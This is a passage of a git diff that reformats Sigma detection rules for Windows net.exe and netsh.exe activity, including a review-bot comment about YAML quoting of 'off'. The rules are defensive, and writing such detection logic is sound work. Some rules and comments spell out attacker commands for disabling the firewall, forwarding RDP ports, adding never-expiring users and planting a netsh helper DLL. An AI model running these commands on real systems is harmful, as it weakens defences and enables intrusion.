@@ -21,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: view + CommandLine|contains: view filter: - CommandLine|contains: \\\\ + CommandLine|contains: \\\\ condition: process_creation and (all of selection_* and not filter) fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml b/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml index b0916ba2d..b0454ef25 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml @@ -1,9 +1,7 @@ title: Unmount Share Via Net.EXE id: cb7c4a03-2871-43c0-9bbb-18bbdb079896 status: test -description: Detects when when a mounted share is removed. Adversaries may remove - share connections that are no longer useful in order to clean up traces of their - operation +description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -21,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - share - /delete condition: process_creation and (all of selection*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml b/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml index e908820fc..1bb29cde9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml @@ -1,8 +1,7 @@ title: Start Windows Service Via Net.EXE id: 2a072a96-a086-49fa-bcb5-15cc5a619093 status: test -description: Detects the usage of the "net.exe" command to start a service using the - "start" flag +description: Detects the usage of the "net.exe" command to start a service using the "start" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community @@ -20,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: ' start ' + CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression condition: process_creation and (all of selection_*) falsepositives: - Legitimate administrator or user executes a service for legitimate reasons. diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml b/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml index fc9c39eb6..87b37b596 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml 
@@ -1,8 +1,8 @@ title: Stop Windows Service Via Net.EXE id: 88872991-7445-4a22-90b2-a3adadb0e827 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -19,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - net.exe - - net1.exe - - Image|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' condition: process_creation and (all of selection_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml index 5e49b77ae..aa1546242 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml 
@@ -8,8 +8,7 @@ references: - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe -author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community - (improvements) +author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) date: 2019/01/16 modified: 2022/07/11 tags: @@ -35,14 +34,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' group' - ' localgroup' - ' user' @@ -58,7 +57,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine - following the search for easy hunting by computer/CommandLine. + - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine. level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml index edd2390b3..0933db629 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml 
@@ -1,14 +1,13 @@ title: Windows Admin Share Mount Via Net.EXE id: 3abd6094-7027-475f-9630-8ab9be7b9725 related: - - id: f117933c-980c-4f78-b384-e3d838111165 - type: similar + - id: f117933c-980c-4f78-b384-e3d838111165 + type: similar status: test description: Detects when an admin share is mounted using net.exe references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view -author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, - wagga +author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga date: 2020/10/05 modified: 2023/02/21 tags: @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - ' \\\\*\\*$' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml index 45c2473b3..fdcc3e91f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml @@ -1,8 +1,7 @@ title: Windows Internet Hosted WebDav Share Mount Via Net.EXE id: 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 status: experimental -description: Detects when an internet hosted webdav share is mounted using the "net.exe" - utility +description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - ' http' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml index 99ca18210..d56b6a6cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml @@ -1,8 +1,8 @@ title: Windows Share Mount Via Net.EXE id: f117933c-980c-4f78-b384-e3d838111165 related: - - id: 3abd6094-7027-475f-9630-8ab9be7b9725 - type: similar + - id: 3abd6094-7027-475f-9630-8ab9be7b9725 + type: similar status: test description: Detects when a share is mounted using the "net.exe" utility references: @@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' use ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml index 9cba7905e..c4870e631 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml 
@@ -24,19 +24,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - :*\\ - /USER:* * filter_empty: - CommandLine|endswith: ' ' + CommandLine|endswith: ' ' condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml b/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml index f07403d53..b2a9cf758 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml @@ -1,8 +1,8 @@ title: New User Created Via Net.EXE id: cd219ff3-fa99-45d4-8380-a7d15116c6dc related: - - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c - type: similar + - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c + type: similar status: test description: Identifies the creation of local users via the net.exe command. references: @@ -23,14 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - user - add condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml b/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml index ccfe5c889..a062c0876 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml @@ -1,11 +1,10 @@ title: New User Created Via Net.EXE With Never Expire Option id: b9f0e6f5-09b4-4358-bae4-08408705bd5c related: - - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc - type: derived + - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc + type: derived status: test -description: Detects creation of local users via the net.exe command with the option - "never expire" +description: Detects creation of local users via the net.exe command with the option "never expire" references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - user - add - expires:never diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml index cc9140724..daa81cb06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml 
@@ -20,18 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' firewall ' - ' add ' filter_optional_dropbox: - CommandLine|contains: - - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program - Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any - - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program - Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any + CommandLine|contains: + - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any + - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml index bf7c0a62f..d808e35f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml 
@@ -1,8 +1,7 @@ title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE id: a35f5a72-f347-4e36-8895-9869b0d5fc6d status: test -description: Detects Netsh command execution that whitelists a program located in - a suspicious location in the Windows Firewall +description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 @@ -21,22 +20,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - - CommandLine|contains|all: - - firewall - - add - - allowedprogram - - CommandLine|contains|all: - - advfirewall - - firewall - - add - - rule - - action=allow - - program= + - CommandLine|contains|all: + - firewall + - add + - allowedprogram + - CommandLine|contains|all: + - advfirewall + - firewall + - add + - rule + - action=allow + - program= selection_paths: - CommandLine|contains: + CommandLine|contains: - :\$Recycle.bin\ - :\RECYCLER.BIN\ - :\RECYCLERS.BIN\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml index 6eefb6ff0..33c1db3cb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml 
@@ -1,8 +1,7 @@ title: RDP Connection Allowed Via Netsh.EXE id: 01aeb693-138d-49d2-9403-c4f52d7d3d62 status: test -description: Detects usage of the netsh command to open and allow connections to port - 3389 (RDP). As seen used by Sarwent Malware +description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware references: - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/ author: Sander Wiebing @@ -20,15 +19,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + # Example: + # Old: netsh firewall add portopening TCP 3389 "Open Port 3389" + # New: netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389 + CommandLine|contains|all: - 'firewall ' - 'add ' - 'tcp ' - '3389' - CommandLine|contains: + CommandLine|contains: - portopening - allow condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml index 2dc9a4306..b24afac90 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Deleted Via Netsh.EXE id: 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 status: test -description: Detects the removal of a port or application rule in the Windows Firewall - configuration using netsh +description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh references: - https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/ author: frack113 
@@ -20,15 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - firewall - 'delete ' filter_optional_dropbox: ParentImage|endswith: \Dropbox.exe - CommandLine|contains: name=Dropbox + CommandLine|contains: name=Dropbox condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml index eae00c3ca..b504df2ed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml @@ -22,20 +22,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli_1: - CommandLine|contains|all: + # Example: netsh firewall set opmode disable + CommandLine|contains|all: - firewall - set - opmode - disable selection_cli_2: - CommandLine|contains|all: + # Example: netsh advfirewall set currentprofile state off + CommandLine|contains|all: - advfirewall - set - state - - 'off' + - off condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml index fff88489c..e19e143dd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml 
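Review bot: Dropping the quotes around `off` in `selection_cli_2` of proc_creation_win_netsh_fw_disable.yml changes the token's YAML type under YAML 1.1 boolean resolution: PyYAML, for example, loads an unquoted `off` as boolean false, so the `contains|all` list would no longer carry the string `off` and the `netsh advfirewall set ... state off` form would not be matched by such a consumer. Hayabusa's own loader may well keep it as a string, but quoting costs nothing and keeps the rule portable across Sigma tooling, so the old side's `- 'off'` should be retained. The other unquoted words in that list (`advfirewall`, `set`, `state`) are not YAML boolean tokens and are unaffected.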
@@ -1,8 +1,7 @@ title: Netsh Allow Group Policy on Microsoft Defender Firewall id: 347906f3-e207-4d18-ae5b-a9403d6bcdef status: test -description: Adversaries may modify system firewalls in order to bypass controls limiting - network usage +description: Adversaries may modify system firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall - https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - advfirewall - firewall - set diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml index ec9307835..7dd7f0cd6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml 
@@ -1,8 +1,7 @@ title: Firewall Configuration Discovery Via Netsh.EXE id: 0e4164da-94bc-450d-a7be-a4b176179f1f status: experimental -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules - https://ss64.com/nt/netsh.html @@ -21,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'netsh ' - 'show ' - 'firewall ' - CommandLine|contains: + CommandLine|contains: - 'config ' - 'state ' - 'rule ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml index 3260d4be7..d5b18af19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Update Via Netsh.EXE id: a70dcb37-3bee-453a-99df-d0c683151be6 status: test -description: Detects execution of netsh with the "advfirewall" and the "set" option - in order to set new values for properties of a existing rule +description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule references: - https://ss64.com/nt/netsh.html author: X__Junior (Nextron Systems) 
@@ -18,10 +17,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: + # Example 1: netsh advfirewall firewall set rule "group=\"Network Discovery\" " new enable=Yes" + # Example 2: netsh advfirewall firewall set rule "group=\"File and Printer Sharing\" " new enable=Yes" - ' firewall ' - ' set ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml index 26b337e80..042134b9a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml 
@@ -1,16 +1,13 @@ title: Potential Persistence Via Netsh Helper DLL id: 56321594-9087-49d9-bf10-524fe8479452 related: - - id: c90362e0-2df3-4e61-94fe-b37615814cb1 - type: similar - - id: e7b18879-676e-4a0e-ae18-27039185a8e7 - type: similar + - id: c90362e0-2df3-4e61-94fe-b37615814cb1 + type: similar + - id: e7b18879-676e-4a0e-ae18-27039185a8e7 + type: similar status: test -description: 'Detects the execution of netsh with "add helper" flag in order to add - a custom helper DLL. This technique can be abused to add a malicious helper DLL - that can be used as a persistence proxy that gets called when netsh.exe is executed. - - ' +description: | + Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md - https://github.com/outflanknl/NetshHelperBeacon @@ -32,10 +29,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: netsh.exe - - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - helper condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml index a67302976..c9398fa82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml 
@@ -1,8 +1,7 @@ title: New Network Trace Capture Started Via Netsh.EXE id: d3c3861d-c504-4c77-ba55-224ba82d0118 status: test -description: Detects the execution of netsh with the "trace" flag in order to start - a network capture +description: Detects the execution of netsh with the "trace" flag in order to start a network capture references: - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/ - https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/ @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - trace - start condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml index 516ade328..c2ce918ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml 
@@ -1,14 +1,12 @@ title: New Port Forwarding Rule Added Via Netsh.EXE id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614 status: test -description: Detects the execution of netsh commands that configure a new port forwarding - (PortProxy) rule +description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ - https://www.dfirnotes.net/portproxy_detection/ -author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan - Poudel +author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel date: 2019/01/29 modified: 2023/09/01 tags: @@ -25,22 +23,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - interface - portproxy - add - v4tov4 selection_cli_2: - CommandLine|contains|all: - - 'i ' - - 'p ' - - 'a ' - - 'v ' + CommandLine|contains|all: + # Example: netsh I p a v l=8001 listena=127.0.0.1 connectp=80 c=192.168.1.1 + - 'i ' # interface + - 'p ' # portproxy + - 'a ' # add + - 'v ' # v4tov4 selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - connectp - listena - c= diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml index 58d123435..d2c4bb955 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml 
@@ -1,8 +1,7 @@ title: RDP Port Forwarding Rule Added Via Netsh.EXE id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 status: test -description: Detects the execution of netsh to configure a port forwarding of port - 3389 (RDP) rule +description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html author: Florian Roth (Nextron Systems), oscd.community @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' i' - ' p' - =3389 diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml index 66c216657..30d460510 100644 --- 